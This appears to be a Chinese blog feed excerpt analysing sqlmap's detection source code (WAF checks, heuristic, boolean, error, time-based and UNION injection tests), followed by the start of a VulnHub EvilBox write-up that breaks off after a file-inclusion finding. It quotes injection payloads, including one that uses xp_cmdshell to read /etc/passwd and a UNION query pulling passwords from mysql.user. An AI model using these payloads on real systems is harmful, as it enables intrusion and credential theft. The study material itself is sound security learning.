<h4 id="checkWaf"><a href="#checkWaf" class="headerlink" title="checkWaf()"></a><strong>checkWaf()</strong></h4><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">checkWaf</span>():</span>    <span class="comment">#如果使用了自定义的参数或者跳过检测会直接return None，跳过waf检测    if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)):        return None    #判断原始状态码，不存在则return None    if kb.originalCode == _http_client.NOT_FOUND:        return None    #取出之前测试存储的数据，判断之前测试的时候有没有waf，如果取出数据不为空，则与探测发现目标地址存在WAF/IPS设备防御    _ = hashDBRetrieve(HASHDB_KEYS.CHECK_WAF_RESULT, True)    if _ is not None:        if _:            warnMsg = &quot;previous heuristics detected that the target &quot;            warnMsg += &quot;is protected by some kind of WAF/IPS&quot;            logger.critical(warnMsg)        return _    #不存在原始界面    if not kb.originalPage:        return None    infoMsg = &quot;checking if the target is protected by &quot;    infoMsg += &quot;some kind of WAF/IPS&quot;    logger.info(infoMsg)</span></span><br></pre></td></tr></table></figure>

<p>payload由随机数字和sqlmap提前设置好的payload来进行WAF检测</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">retVal = False    payload = &quot;%d %s&quot; % (randomInt(), IPS_WAF_CHECK_PAYLOAD)</span><br></pre></td></tr></table></figure>

<p><strong>IPS_WAF_CHECK_PAYLOAD</strong>位置：lib/cpre/settings.py</p>
<p>可以看到包括了xss、sql、命令执行等</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Payload used for checking of existence of WAF/IPS (dummier the better)IPS_WAF_CHECK_PAYLOAD = &quot;AND 1=1 UNION ALL SELECT 1,NULL,&#x27;&lt;script&gt;alert(\&quot;XSS\&quot;)&lt;/script&gt;&#x27;,table_name FROM information_schema.tables WHERE 2&gt;1--/**/; EXEC xp_cmdshell(&#x27;cat ../../../etc/passwd&#x27;)#&quot;</span></span><br></pre></td></tr></table></figure>

<p>将payload进行拼接，根据是否重定向进行参数配置。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> PLACE.URI <span class="keyword">in</span> conf.parameters:        place = PLACE.POST        value = <span class="string">&quot;%s=%s&quot;</span> % (randomStr(), agent.addPayloadDelimiters(payload))    <span class="keyword">else</span>:        place = PLACE.GET        value = <span class="string">&quot;&quot;</span> <span class="keyword">if</span> <span class="keyword">not</span> conf.parameters.get(PLACE.GET) <span class="keyword">else</span> conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER        value += <span class="string">&quot;%s=%s&quot;</span> % (randomStr(), agent.addPayloadDelimiters(payload))    pushValue(kb.choices.redirect)    pushValue(kb.resendPostOnRedirect)    pushValue(conf.timeout)    kb.choices.redirect = REDIRECTION.YES    kb.resendPostOnRedirect = <span class="literal">False</span>    conf.timeout = IPS_WAF_CHECK_TIMEOUT    <span class="keyword">try</span>:        <span class="comment">#queryPage()这个函数用于获取目标页面内容并返回页面比例（0&lt;=ratio&lt;=1）或者表示布尔值(0||1)，如果这个值小于0.5（IPS_WAF_CHECK_RATIO）则返回True存在WAF，反之False则不存在WAF        retVal = (Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, raise404=False, disableTampering=True)[1] or 0) &lt; IPS_WAF_CHECK_RATIO    except SqlmapConnectionException:        retVal = True    finally:        kb.matchRatio = None</span></span><br></pre></td></tr></table></figure>

<p>测试完毕，将结果写入数据库，并根据结果进行用户交互。</p>
<p>目标可能存在某种WAF/IPS，是否进行更深度的测试。如果没有**–tamper**会让你考虑使用tamper脚本绕过WAF。</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211130193414009.png" alt="image-20211130193414009"></p>
<h4 id="identYwaf"><a href="#identYwaf" class="headerlink" title="identYwaf"></a>identYwaf</h4><p>Sqlmap有个插件用于识别WAF指纹，该插件位于：**/thirdparty/identywaf/identYwaf.py**</p>
<p>通过全局搜索可以发现在**/lib/request/basic.py** 中的<strong>processResponse()<strong>函数引用该插件，</strong>processResponse()<strong>又在</strong>lib/request/connect.py</strong>中的**getPage()<strong>，而</strong>getPage()<strong>的调用场景就比较多了，在Sqlmap需要获取页面信息的时候就会调用这个函数（还记得</strong>checkWaf()**中有一段代码比较返回页面内容比例么？），有点绕梳理一下过程。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">getPage()-&gt;processResponse()-&gt;identYwaf.py</span><br></pre></td></tr></table></figure>



<p>来简单看一下<strong>processResponse()</strong></p>
<p>**parseResponse()**函数根据web应用返回的DBMS错误信息中后端DBMS指纹来检测判断可能的后台数据库。</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207160143521.png" alt="image-20211207160143521"></p>
<p>接着<strong>if</strong>比较了<strong>kb.processResponseCounter</strong> 和<strong>IDENTYWAF_PARSE_LIMIT</strong>，前者每次调用**processResponse()**加1，后者默认为10。可以看到这里会打印出WAF/IPS的识别结果</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207160312902.png" alt="image-20211207160312902"></p>
<p>具体看下<strong>non_blind_check()<strong>，这里进行了一个正则匹配，匹配</strong>WAF_RECOGNITION_REGEX</strong>、<strong>rawResponse</strong>或””中的内容，将匹配到的结果加入non_blind中。</p>
<p><strong>WAF_RECOGNITION_REGEX</strong>为<strong>identYwafA.py</strong>中的一个全局变量，通过<strong>load_data()<strong>从</strong>data.json</strong>导入</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">non_blind_check</span>(<span class="params">raw, silent=<span class="literal">False</span></span>):</span>    retval = <span class="literal">False</span>    match = re.search(WAF_RECOGNITION_REGEX, raw <span class="keyword">or</span> <span class="string">&quot;&quot;</span>)    <span class="keyword">if</span> match:        retval = <span class="literal">True</span>        <span class="keyword">for</span> _ <span class="keyword">in</span> match.groupdict():            <span class="keyword">if</span> match.group(_):                waf = re.sub(<span class="string">r&quot;\Awaf_&quot;</span>, <span class="string">&quot;&quot;</span>, _)                non_blind.add(waf)                <span class="keyword">if</span> <span class="keyword">not</span> silent:                    single_print(colorize(<span class="string">&quot;[+] non-blind match: &#x27;%s&#x27;%s&quot;</span> % (format_name(waf), <span class="number">20</span> * <span class="string">&#x27; &#x27;</span>)))    <span class="keyword">return</span> retval</span><br></pre></td></tr></table></figure>

<p>下面是<strong>data.json</strong>中关于waf的部分截图</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207161722271.png" alt="image-20211207161722271"></p>
<p>Sqlmap通过Payload检测目标是否有WAF，<strong>processResponse</strong>会跑十次，通过十次连接返回的结果并进行正则匹配来识别WAF指纹信息</p>
<h4 id="heuristcCheckSqlInjection"><a href="#heuristcCheckSqlInjection" class="headerlink" title="heuristcCheckSqlInjection()"></a>heuristcCheckSqlInjection()</h4><p>启发式注入，用各种payload进行测试</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">check = heuristicCheckSqlInjection(place, parameter)</span><br></pre></td></tr></table></figure>

<p>开始从conf中拿数据，包括是否跳过测试</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207191644488.png" alt="image-20211207191644488"></p>
<p>自定义前后缀，下面举个例子</p>
<blockquote>
<p>prefix: ‘)’</p>
<p>suffix: ‘AND ([RANDNUM]=[RANDNUM]’</p>
<p>假设的完整payload：1) AND 7862=7862 AND (9976=9976</p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207193008973.png" alt="image-20211207193008973"></p>
<p>生成随机字符串，例如<code>&#39;),)\&#39;.&quot;,(.)&#39;</code>，其中</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Alphabet used for heuristic checksHEURISTIC_CHECK_ALPHABET = (&#x27;&quot;&#x27;, &#x27;\&#x27;&#x27;, &#x27;)&#x27;, &#x27;(&#x27;, &#x27;,&#x27;, &#x27;.&#x27;)</span></span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207193110200.png" alt="image-20211207193110200"></p>
<p>对payload进行拼接，并用**queryPage()**比对页面相似度</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207193436099.png" alt="image-20211207193436099"></p>
<p>接下来两个函数<strong>parseFilePaths()<strong>和</strong>wasLastResponseDBMSError()</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207194325930.png" alt="image-20211207194325930"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">parseFilePaths(page) <span class="comment">#检测页面中（可能的）系统绝对路径wasLastResponseDBMSError() #检测是否出现（可识别的）数据库报错</span></span><br></pre></td></tr></table></figure>

<p>检测服务端是否存在格式化参数出现报错信息的情况</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207195446474.png" alt="image-20211207195446474"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Strings for detecting formatting errorsFORMAT_EXCEPTION_STRINGS = (&quot;Type mismatch&quot;, &quot;Error converting&quot;, &quot;Please enter a&quot;, &quot;Conversion failed&quot;, &quot;String or binary data would be truncated&quot;, &quot;Failed to convert&quot;, &quot;unable to interpret text value&quot;, &quot;Input string was not in a correct format&quot;, &quot;System.FormatException&quot;, &quot;java.lang.NumberFormatException&quot;, &quot;ValueError: invalid literal&quot;, &quot;TypeMismatchException&quot;, &quot;CF_SQL_INTEGER&quot;, &quot;CF_SQL_NUMERIC&quot;, &quot; for CFSQLTYPE &quot;, &quot;cfqueryparam cfsqltype&quot;, &quot;InvalidParamTypeException&quot;, &quot;Invalid parameter type&quot;, &quot;Attribute validation error for tag&quot;, &quot;is not of type numeric&quot;, &quot;&lt;cfif Not IsNumeric(&quot;, &quot;invalid input syntax for integer&quot;, &quot;invalid input syntax for type&quot;, &quot;invalid number&quot;, &quot;character to number conversion error&quot;, &quot;unable to interpret text value&quot;, &quot;String was not recognized as a valid&quot;, &quot;Convert.ToInt&quot;, &quot;cannot be converted to a &quot;, &quot;InvalidDataException&quot;, &quot;Arguments are of the wrong type&quot;)</span></span><br></pre></td></tr></table></figure>

<p>采用了数字型的payload，例如原始页面id=3，随机生成了4，那么现在请求为id=7-4，利用**queryPage()**来比较页面相似度。</p>
<p>如果数字型返回结果为False则用字符型再试一次，例如原始页面id=3，生成id=3aaa，利用**queryPage()**来比较页面相似度。</p>
<p>根据结果对<strong>casting</strong>赋值（True or False）。</p>
<p>下面这个heavilyDynamic似乎是页面动态性过强时，直接就报错退出了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207200147236.png" alt="image-20211207200147236"></p>
<p>当casting为True时，根据 URL split 拆分得到可能的后端语言，并根据不同语言给出可能的处理参数方式，有两种可能走到这个位置：</p>
<p>1.格式化参数出现报错信息，即上文**def _(page)**处。</p>
<p>2.id=3和id=3aaa通过**queryPage()**来比较页面相似度，得到的返回值为True，即页面返回结果相同（字符型）</p>
<p>通过这种方式可以基本判断服务端处理参数的方式。</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207204739859.png" alt="image-20211207204739859"></p>
<p>当result为True时，id=3和id=7-4页面相似度高（数字型），通过**getErrorParsedDBMSes()**获取可能的后端数据库类型，否则提示“not be injectable”</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207210215547.png" alt="image-20211207210215547"></p>
<p>在注入检测完毕后，还会进行简单的XSS和文件包含漏洞检测（很基础，基本没啥用）</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211207210543310.png" alt="image-20211207210543310"></p>
<h4 id="checkSqlInjection"><a href="#checkSqlInjection" class="headerlink" title="checkSqlInjection()"></a>checkSqlInjection()</h4><p>检测是否存在SQL注入的核心函数</p>
<p>**InjectionDict()**顾名思义是一个字典，用于存储一些注入成功的边界值和payload数据（边界值应该就是payload的前后缀信息）</p>
<p>**isDigit()<strong>和</strong>isalpha()**这些是根据已知参数来对boundaries进行排序筛选</p>
<p>**getSortedInjectionTests()<strong>的作用是从错误消息中检测到的DBMS返回优先测试列表，测试项对应的payload在</strong>/data/xml/payloads/<strong>，在</strong>init()<strong>中通过</strong>loadPayloads()**加载</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211210165757597.png" alt="image-20211210165757597"></p>
<p>下图两张payload的具体样例（上为联合注入，下为布尔盲注）</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211210172123327.png" alt="image-20211210172123327"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211210173415957.png" alt="image-20211210173415957"></p>
<blockquote>
<p>text标签包含的信息：</p>
<p>title：测试名称或者说测试输出标题</p>
<p>stype：注入类型，Sqlmap支持六种注入类型（1-6）。&lt;1：布尔盲注；2：报错注入；3：内联注入；4：堆叠注入；5：时间盲注；6：联合注入&gt;</p>
<p>level：测试等级（1-5）</p>
<p>risk：风险等级，可能对数据库造成的风险（1-3）</p>
<p>clause：表示对应的测试payload适用于哪种类型的SQL语句。&lt;0：Always；1：Where/Having&gt;；2：Group by；3：Order by；4：Limit；5：Offset；6：Top；7：Table name；8：Column name；9：Pre-WHERE（non-query）</p>
<p>where：如何添加完整的payload（1-3）。&lt;1：在原始值后面添加payload；2：将原始值替换为不存在的随机字符串后添加payload；3：用payload替换原始值&gt;</p>
<p>vector：payload大概的样子，在具体测试中受前后缀和tamper脚本等影响payload不一定和vector中的内容相同</p>
<p>request：发起请求的配置。其中不可缺少payload，comment不一定有，char和columns只有UNION中存在</p>
<p>payload：实际测试使用的payload</p>
<p>comment：注释，放在后缀前</p>
<p>char：UNION特有字段，用于爆破字段数量</p>
<p>columns：UNION特有字段，用于查询字段范围</p>
<p>response：判断payload注入成功与否</p>
<p>*comparison：布尔盲注特有字段，用于对比request中请求结果</p>
<p>grep：报错注入特有字段，使用正则表达式匹配请求结果</p>
<p>time：时间盲注特有字段，等待时间</p>
<p>*union：处理联合注入的方法</p>
<p>details：根据response标签得出的结果，比如，得出数据库类型（dbms）</p>
<p>dbms：数据库类型</p>
<p>dbms_version：数据库版本</p>
<p>os：操作系统</p>
</blockquote>
<p>第一个<strong>if</strong>判断是否停止检测。</p>
<p>第二个<strong>if</strong>判断是否指纹识别出后台数据库，如果没有识别将采用布尔盲注的形式对数据库进行检测。</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211210190454459.png" alt="image-20211210190454459"></p>
<p>检测利用了**heuristicCheckDbms()**这个函数，关键代码如下</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">for</span> dbms <span class="keyword">in</span> getPublicTypeMembers(DBMS, <span class="literal">True</span>):    randStr1, randStr2 = randomStr(), randomStr()    Backend.forceDbms(dbms)    <span class="keyword">if</span> dbms <span class="keyword">in</span> HEURISTIC_NULL_EVAL:        result = checkBooleanExpression(<span class="string">&quot;(SELECT %s%s) IS NULL&quot;</span> % (HEURISTIC_NULL_EVAL[dbms], FROM_DUMMY_TABLE.get(dbms, <span class="string">&quot;&quot;</span>)))    <span class="keyword">elif</span> <span class="keyword">not</span> ((randStr1 <span class="keyword">in</span> unescaper.escape(<span class="string">&quot;&#x27;%s&#x27;&quot;</span> % randStr1)) <span class="keyword">and</span> <span class="built_in">list</span>(FROM_DUMMY_TABLE.values()).count(FROM_DUMMY_TABLE.get(dbms, <span class="string">&quot;&quot;</span>)) != <span class="number">1</span>):        result = checkBooleanExpression(<span class="string">&quot;(SELECT &#x27;%s&#x27;%s)=%s%s%s&quot;</span> % (randStr1, FROM_DUMMY_TABLE.get(dbms, <span class="string">&quot;&quot;</span>), SINGLE_QUOTE_MARKER, randStr1, SINGLE_QUOTE_MARKER))    <span class="keyword">else</span>:        result = <span class="literal">False</span>    <span class="keyword">if</span> result:        <span class="keyword">if</span> <span class="keyword">not</span> checkBooleanExpression(<span class="string">&quot;(SELECT &#x27;%s&#x27;%s)=%s%s%s&quot;</span> % (randStr1, FROM_DUMMY_TABLE.get(dbms, <span class="string">&quot;&quot;</span>), SINGLE_QUOTE_MARKER, randStr2, SINGLE_QUOTE_MARKER)):            retVal = dbms            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>其中<strong>FROM_DUMMY_TABLE</strong>为不同数据库所特有的表</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211210192009838.png" alt="image-20211210192009838"></p>
<p>除了这种方式，不同数据库的查询语句不同，根据payload的测试情况也能判断对应的数据库类型</p>
<p>判断出数据库类型以后，与用户进行简单交互以及属性配置</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211210194445492.png" alt="image-20211210194445492"></p>
<p>接下来是<strong>联合查询</strong>，其中包括了是否指定列的范围等</p>
<p>。。。</p>
<p>判断是否指定注入技术</p>
<p>如果为相同的sql注入类型，则跳过</p>
<p>解析DBMS特有payload信息</p>
<p>。。。</p>
<p>（各种测试跳过判断）</p>
<p>这里根据测试来强制转换数据库类型，保证payload是对应当前数据库的</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211210195555393.png" alt="image-20211210195555393"></p>
<p>接下来的一段代码直到布尔盲注之前，主要是在分析确定payload拼接的前后缀、参数类型以及为接下来的测试铺垫（主要是关于拼接的内容），其中用户通过**–prefix<strong>和</strong>–suffix**设定的前后缀拥有更高的优先级</p>
<p>接下来是不同类型的注入：</p>
<h5 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h5><p>首先生成payload</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211214174351461.png" alt="image-20211214174351461"></p>
<p>这里的请求包括了三种情况：</p>
<blockquote>
<p>正常请求：id=1</p>
<p>正逻辑请求：id=1 or 1=1</p>
<p>负逻辑请求：id=1 or 1=2</p>
</blockquote>
<p>对比包括了两种情况：</p>
<blockquote>
<p>1、正常请求与负逻辑进行对比</p>
<p>2、负逻辑、原始界面（正常请求）和启发性测试对比</p>
</blockquote>
<p>通过获取的不同页面进行比较</p>
<p>①正常响应与正逻辑响应是否相同</p>
<p>②在①的前提下比较负逻辑响应和正常响应</p>
<p>③发送错误的payload并与正常请求进行比较</p>
<p>总之就是通过对不同响应页面进行比较来判断是否存在注入点。</p>
<p>在这之后如果用户输入的参数中带有**–string<strong>或者</strong>–code**即指定了判断的识别字符或者状态码，也会对是否存在注入点的判断产生影响</p>
<p>具体代码就不贴了</p>
<h5 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h5><p>代码很短</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211214191454063.png" alt="image-20211214191454063"></p>
<p>这里对报错注入判断逻辑比较简单，利用了正则匹配</p>
<p>（上文在分析Sqlmap的payload中各种标签作用时提到了报错注入特有的<strong>grep</strong>标签）</p>
<p>存在以下情况中的任意一种符合<strong>grep</strong>则判断为可注入：</p>
<blockquote>
<p>1、页面内容错误</p>
<p>2、HTTP的错误响应（例如：500）</p>
<p>3、header中的内容</p>
<p>4、重定向信息</p>
</blockquote>
<h5 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h5><p>懂得都懂，就是设置了sleep以后响应时间是否变长来判断</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211214193343059.png" alt="image-20211214193343059"></p>
<p>这里调用queryPage()函数时，设置了参数<strong>timeBasedCompare = True</strong>，可以跟进看下用来干嘛</p>
<p>当时间比较参数为真，会调用**wasLastResponseDelayed()**函数，这个函数就是在请求存在时间延迟时返回True</p>
<p><strong>wasLastResponseDelayed()</strong></p>
<p>结合一下给的注释来理解，这里先获取几次访问的响应时间（生成了一个响应时间的列表），并且利用**stdev()**计算出标准差</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215152011217.png" alt="image-20211215152011217"></p>
<p><strong>MIN_TIME_RESPONSES = 30</strong>，如果列表中的响应时间数小于30，则<strong>if</strong>语句会一直循环直到30次</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215152421341.png" alt="image-20211215152421341"></p>
<p><strong>TIME_STDEV_COEFF = 7</strong>，<strong>lowerStdLimit</strong> = 7*标准差 + 响应时间列表的算术平均值</p>
<p><strong>MIN_VALID_DELAYED_RESPONSE = 0.5</strong>，计算出来的下限值和最小有效延迟进行比较</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215153713508.png" alt="image-20211215153713508"></p>
<p>跳出上一个循环后，会询问用户是否优化延迟响应的值（time-sec = 5），如果选自了<strong>Yes</strong>则会使用**adjustTimeDelay()**函数进行计算调整</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215154456661.png" alt="image-20211215154456661"></p>
<p>这里又减掉了5(s)，Why？</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215154550048.png" alt="image-20211215154550048"></p>
<p>这里采用的时间流程为：</p>
<blockquote>
<p>1’ AND SLEEP(5) AND ‘xxxx’ = ‘xxxx</p>
<p>1’ AND SLEEP(0) AND ‘xxxx’ = ‘xxxx</p>
<p>1’ AND SLEEP(5) AND ‘xxxx’ = ‘xxxx</p>
</blockquote>
<p>由此根据响应结果来判断是否存在时间盲注</p>
<p>sqlmap对时间盲注的判断是只要 超过标准的延迟时间就认为是有延迟了而不是直接判断测试的延迟时间</p>
<h5 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h5><p>这里干了几件事：</p>
<blockquote>
<p>1、进行了初始配置 char = NULL,columns = 1-20</p>
<p>2、判断是否识别出数据库类型，如果没有可以尝试通过**–dbms**设置</p>
<p>3、自动扩展 UNION 查询注入技术测试的范围，因为至少发现了一种其他（潜在）技术  ps：这条不是很懂</p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215162625545.png" alt="image-20211215162625545"></p>
<p>这里是关键</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215202300874.png" alt="image-20211215202300874"></p>
<p><strong>unionTest()</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215202401388.png" alt="image-20211215202401388"></p>
<p>其中的核心函数**_unionTestByCharBruteforce()**</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/KZY]XCJTV6A3K8XFYL4IHUQ.png" alt="img"></p>
<p>其中的**_findUnionCharCount()<strong>和</strong>_unionConfirm()**分别来看下</p>
<p><strong>_findUnionCharCount()</strong></p>
<p>其中定义了**_orderByTest()<strong>函数，和手工注入利用order by测列数原理一样，这里拼接好payload以后，通过</strong>queryPage()**对比页面来判断。</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215203737369.png" alt="image-20211215203737369"></p>
<p>下面代码中利用了二分法，节省判断时间</p>
<p>如果order by失效，还会调用<strong>agent.py</strong>中的**forgeUnionQuery()**函数。这个函数的作用是输入一个查询字符串并返回其处理过的UNION ALL SELECT 查询。 </p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Examples:MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.userMySQL output:UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488</span><br></pre></td></tr></table></figure>



<p><strong>_unionConfirm()</strong></p>
<p>找到了列数后，接着寻找输出点，只需要将 UNION SELECT NULL,NULL,….,NULL 中的NULL依次替换，然后在结果中寻找插入的随机的字符串，就可以定位到输出点的位置，主要用到了**_unionPosition()**</p>
<p>**_unionPosition()<strong>中也调用了</strong>forgeUnionQuery()**函数</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215210924072.png" alt="image-20211215210924072"></p>
<p>下面是判断用户是否在检测阶段终止检测</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215213508641.png" alt="image-20211215213508641"></p>
<p>最后返回注入结果</p>
<p>其中的三个函数**checkFalsePositives()<strong>、</strong>checkSuhosinPatch()<strong>、</strong>checkFilteredChars()**，作用如下：</p>
<p>1、检查误报</p>
<p>2、检测Suhosin或者其他保护机制（<em>Suhosin</em>是一个PHP程序的保护系统）</p>
<p>3、检查过滤字符</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211215213527910.png" alt="image-20211215213527910"></p>
<h2 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h2><p>附上一张<a href="https://www.processon.com/view/5835511ce4b0620292bd7285#pc">sqlmap源码流程图</a></p>
<p>第一次看工具代码 可能写的有点乱 有问题欢迎指出交流</p>
]]></content>
      <tags>
        <tag>工具</tag>
        <tag>Python</tag>
        <tag>sqlmap</tag>
      </tags>
  </entry>
  <entry>
    <title>VulnHub-EvilBox</title>
    <url>/2022/01/12/VulnHub-EvilBox/</url>
    <content><![CDATA[<h1 id="VulnHub-EvilBox"><a href="#VulnHub-EvilBox" class="headerlink" title="VulnHub-EvilBox"></a>VulnHub-EvilBox</h1><p><strong>Level: Easy</strong></p>
<span id="more"></span>

<h2 id="Before-Start"><a href="#Before-Start" class="headerlink" title="Before Start"></a>Before Start</h2><p>用VMware导入ovf发现靶机没有IP时的处理方法如下：</p>
<p>在下图载入界面时按e</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106154334064.png" alt="image-20220106154334064"></p>
<p>把<code>ro</code>改成<code>rw signie init=/bin/bash </code>，修改完毕Ctrl+x重启服务</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106154632629.png" alt="image-20220106154632629"></p>
<p>进入如下界面以后用vi修改网卡配置文件，<code>vi  /etc/network/interfaces</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106154742384.png" alt="image-20220106154742384"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106154858822.png" alt="image-20220106154858822"></p>
<p>把网卡改成ens33即可，重启网卡服务<code>/etc/init.d/networking restart</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106155532979.png" alt="image-20220106155532979"></p>
<p>重启靶机虽然没有显示IP但是问题已经解决了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106160625267.png" alt="image-20220106160625267"></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106160741944.png" alt="image-20220106160741944"></p>
<p>开放22、80端口</p>
<h3 id="gobuster"><a href="#gobuster" class="headerlink" title="gobuster"></a>gobuster</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106181809019.png" alt="image-20220106181809019"></p>
<p>发现<code>robots.txt</code>和<code>secret</code>，依次访问结果如下</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106181933222.png" alt="image-20220106181933222"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106182035033.png" alt="image-20220106182035033"></p>
<p>加上<code>/secret</code>继续爆破，发现<code>evil.php</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106182312683.png" alt="image-20220106182312683"></p>
<p>访问<code>evil.php</code>还是个空白页</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220106182436881.png" alt="image-20220106182436881"></p>
<p>fuzz一下发现存在文件包含，GET参数为<strong>command</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220107140908040.png" alt="image-20220107140908040"></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="任意文件包含"><a href="#任意文件包含" class="headerlink" title="任意文件包含"></a>任意文件包含</h3><p>通过<code>php://filter/convert.base64-encode/resource=evil.php</code>查看<code>evil.php</code>源码如下</p>
